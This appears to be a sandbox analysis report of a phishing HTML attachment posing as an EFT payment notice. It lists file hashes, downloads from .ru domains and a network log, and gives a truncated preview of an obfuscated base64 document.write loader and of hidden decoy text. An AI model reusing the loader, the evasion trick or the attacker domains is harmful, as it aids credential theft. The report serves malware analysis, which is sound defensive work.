                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47520)
                                                                Category:dropped
                                                                Size (bytes):47521
                                                                Entropy (8bit):5.3981340461317835
                                                                Encrypted:false
                                                                SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                MD5:7C92EC9D1395055CE0405A32607C7291
                                                                SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                Malicious:false
                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (47520)
                                                                Category:downloaded
                                                                Size (bytes):47521
                                                                Entropy (8bit):5.3981340461317835
                                                                Encrypted:false
                                                                SSDEEP:768:11CQfmIG2Y8rHnzH5ei80aszzQhpdldr6F/PG2XvE2L79noBL5o6HBU91KL5Gc05:1a/0HnzH5eJdV0lGYv7f96Hjy
                                                                MD5:7C92EC9D1395055CE0405A32607C7291
                                                                SHA1:4EF0060484503E7A3D005254484D5A7FACF42F27
                                                                SHA-256:A0DDAE0FB79C4A4A66D8613157A0703771FA9BE1A75790FCCF5EEEBAA329788B
                                                                SHA-512:D5FAD8CE3B4B3603A6C48676E3F561437034F469875608FF1795505BFA89853A63767E32A1E65BC541DF18C555F93DB42896AA0C1EBD9B162EFC1899FE2D925B
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/turnstile/v0/b/e0c90b6a3ed1/api.js
                                                                Preview:"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:downloaded
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):89501
                                                                Entropy (8bit):5.289893677458563
                                                                Encrypted:false
                                                                SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                Malicious:false
                                                                URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):3.990210155325004
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                                                                MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                                                                SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                                                                SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                                                                SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                                                                Malicious:false
                                                                Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:downloaded
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                URL:https://s8zvm920jqjiu0mkvwrkbz6zbaapggwaat1ppvh6sofcvojnfpayo.mentespic.ru/tpsifzxrcjpnmiqlcapcxqSIHzEofYKCVZVKRCCQIPXIQHQALLZRCDVNUAXO
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:PNG image data, 11 x 46, 8-bit/color RGB, non-interlaced
                                                                Category:dropped
                                                                Size (bytes):61
                                                                Entropy (8bit):4.068159130770307
                                                                Encrypted:false
                                                                SSDEEP:3:yionv//thPl6ZtMyxl/k4E08up:6v/lhP8Qy7Tp
                                                                MD5:08C0400293E6D2816DBB9E405C50387B
                                                                SHA1:ADBF5671205B488D51DB04FF8F933B9627E2A24E
                                                                SHA-256:5B81C0EFAC3DE652A4836657F49F0F72220AD437BF89263A8B3936A22913A398
                                                                SHA-512:3FF1690D580E7C13D38ACDF95EBA9C854040A851B7EDDA2BA31096306FDFC18293A111CE423D060654D399FA9119ED58DA0CB8C93439A2B1EAA5EE73384441FD
                                                                Malicious:false
                                                                Preview:.PNG........IHDR.............q.t.....IDAT.....$.....IEND.B`.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):48316
                                                                Entropy (8bit):5.6346993394709
                                                                Encrypted:false
                                                                SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                MD5:2CA03AD87885AB983541092B87ADB299
                                                                SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                Malicious:false
                                                                Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:very short file (no magic)
                                                                Category:dropped
                                                                Size (bytes):1
                                                                Entropy (8bit):0.0
                                                                Encrypted:false
                                                                SSDEEP:3:U:U
                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                Malicious:false
                                                                Preview:1
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:HTML document, ASCII text, with very long lines (7481), with CRLF line terminators
                                                                Category:downloaded
                                                                Size (bytes):19865
                                                                Entropy (8bit):5.882232250529639
                                                                Encrypted:false
                                                                SSDEEP:384:gnu69N5ZJ1KeCNRFKa2Ml6nu69N5ZJ1KeCNRFKa2Ml6lrAlrJ:SN5ZJseCof2wN5ZJseCof26lrAlrJ
                                                                MD5:F0F204F6D37411A9E1A012B0A7F24743
                                                                SHA1:611B6E7488C6DA7ACDF03F70375CC1A762D2D655
                                                                SHA-256:CFF4D7E2C40261A7EF55E5DE28037C840634D53763AB09E6C9C5AD80413B0F2D
                                                                SHA-512:7AF2FB2BE66405FB8651D8EB0AD9B78979FBCF6857FC95C13945C5205898B371F38F8387EAA4B2D9E08EE401CD479EF873711107E86BFC0899B98D71B9EB2F06
                                                                Malicious:false
                                                                URL:https://rfll.yordickyel.ru/16E/
                                                                Preview:<script>....if(atob("aHR0cHM6Ly9yRkxMLnlvcmRpY2t5ZWwucnUvMTZFLw==") == "nomatch"){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiNDckt5cXNObG5VIGg0e21hcmdpb
                                                                File type:HTML document, ASCII text, with very long lines (1023), with CRLF line terminators
                                                                Entropy (8bit):6.008340316244067
                                                                TrID:
                                                                • HyperText Markup Language (12001/1) 29.26%
                                                                • HyperText Markup Language (12001/1) 29.26%
                                                                • HyperText Markup Language (11001/1) 26.83%
                                                                • HyperText Markup Language (6006/1) 14.65%
                                                                File name:EFT_Payment_Notification_Warriorsheart.html
                                                                File size:1'781 bytes
                                                                MD5:54884622bdfd2d41c5f7de404df998d6
                                                                SHA1:5fe436306c3ade0bbf69a9347750e1824b2a56ed
                                                                SHA256:517f5778d40ff3a5956f7938ea4a516730c0b69083ae1305498e72c8ab7fb0fc
                                                                SHA512:f2e8f9b1cc34b89059bb7efc79f87687a96917931b6f8600d5c0426fc9d0518c8700ca6ab4c66cd0bba64b60b148aeb05a1a236985ab42548cb4c0a1a568512b
                                                                SSDEEP:24:8CyxKcrOzeJICgkACcuZJW0tMxtt/tHWkJ+9zFK4XfgKqgAouThX4z8zk2PyZinC:2xlazeJ7AJ6JSX/CUy8oohQEkMyikR/
                                                                TLSH:4C3196D2051B3619C4E1C6496B53E2E01B3F51327685149FB91F028713F534AD8C32FE
                                                                File Content Preview:<html>.. <head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <meta name="robots" content="noindex, nofollow">.. </head>.. <body>.. <span hidden>The children built a fort with blankets and pillows.<
                                                                TimestampSource PortDest PortSource IPDest IP
                                                                Jan 13, 2025 20:54:38.692888975 CET49675443192.168.2.523.1.237.91
                                                                Jan 13, 2025 20:54:38.693058968 CET49674443192.168.2.523.1.237.91
                                                                Jan 13, 2025 20:54:38.802378893 CET49673443192.168.2.523.1.237.91
                                                                Jan 13, 2025 20:54:45.667248964 CET4970453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:45.672342062 CET53497041.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:45.672508955 CET4970453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:45.672578096 CET4970453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:45.672578096 CET4970453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:45.677496910 CET53497041.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:45.677527905 CET53497041.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:46.116632938 CET53497041.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:46.117516994 CET4970453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:46.122709036 CET53497041.1.1.1192.168.2.5
                                                                Jan 13, 2025 20:54:46.122792959 CET4970453192.168.2.51.1.1.1
                                                                Jan 13, 2025 20:54:47.155968904 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.156025887 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.156121016 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.162894964 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.162928104 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.662879944 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.663180113 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.663218975 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.664699078 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.664782047 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.666413069 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.666501999 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.666511059 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.707350016 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.713953018 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:47.713998079 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:47.759625912 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.307029963 CET49675443192.168.2.523.1.237.91
                                                                Jan 13, 2025 20:54:48.307035923 CET49674443192.168.2.523.1.237.91
                                                                Jan 13, 2025 20:54:48.413969040 CET49673443192.168.2.523.1.237.91
                                                                Jan 13, 2025 20:54:48.427622080 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427731037 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427763939 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427793026 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427829027 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427840948 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.427865028 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427932978 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.427973032 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.427973986 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.432310104 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.432348967 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.432380915 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.432384014 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.432401896 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.432451963 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.479372978 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.479469061 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520102978 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520155907 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520221949 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520247936 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520268917 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.520359039 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520399094 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.520401001 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.520467043 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.521069050 CET49712443192.168.2.5172.67.198.166
                                                                Jan 13, 2025 20:54:48.521102905 CET44349712172.67.198.166192.168.2.5
                                                                Jan 13, 2025 20:54:48.544507980 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:48.544550896 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:48.544631958 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:48.544714928 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:48.544765949 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:48.544991016 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:48.545103073 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:48.545160055 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:48.545222998 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:48.545352936 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:48.545371056 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:48.545588017 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:48.545610905 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:48.545763969 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:48.545779943 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:49.004476070 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.004772902 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.004837990 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.005752087 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.005857944 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.006850958 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.006920099 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.007035017 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.031194925 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.033279896 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:49.039010048 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:49.039046049 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:49.039063931 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.039076090 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.040597916 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.040638924 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:49.040679932 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.040740013 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:49.042762995 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:49.042857885 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:49.043783903 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.043883085 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:49.043895960 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.043900967 CET44349715104.17.25.14192.168.2.5
                                                                Jan 13, 2025 20:54:49.044033051 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.047333956 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.056873083 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.056931973 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.087340117 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.090030909 CET49715443192.168.2.5104.17.25.14
                                                                Jan 13, 2025 20:54:49.090219021 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.090236902 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.107091904 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.139343977 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.148356915 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.148596048 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.148648977 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.148668051 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.148749113 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.148797989 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.148813009 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.148890972 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.148942947 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.148952007 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.149045944 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.149128914 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.149162054 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.149171114 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.149338961 CET49713443192.168.2.5151.101.130.137
                                                                Jan 13, 2025 20:54:49.152822018 CET44349713151.101.130.137192.168.2.5
                                                                Jan 13, 2025 20:54:49.157078028 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.157141924 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.157288074 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.157533884 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.157533884 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.157584906 CET44349714104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.157859087 CET49714443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.159961939 CET49717443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.160007000 CET44349717104.18.94.41192.168.2.5
                                                                Jan 13, 2025 20:54:49.160065889 CET49717443192.168.2.5104.18.94.41
                                                                Jan 13, 2025 20:54:49.160320997 CET49717443192.168.2.5104.18.94.41
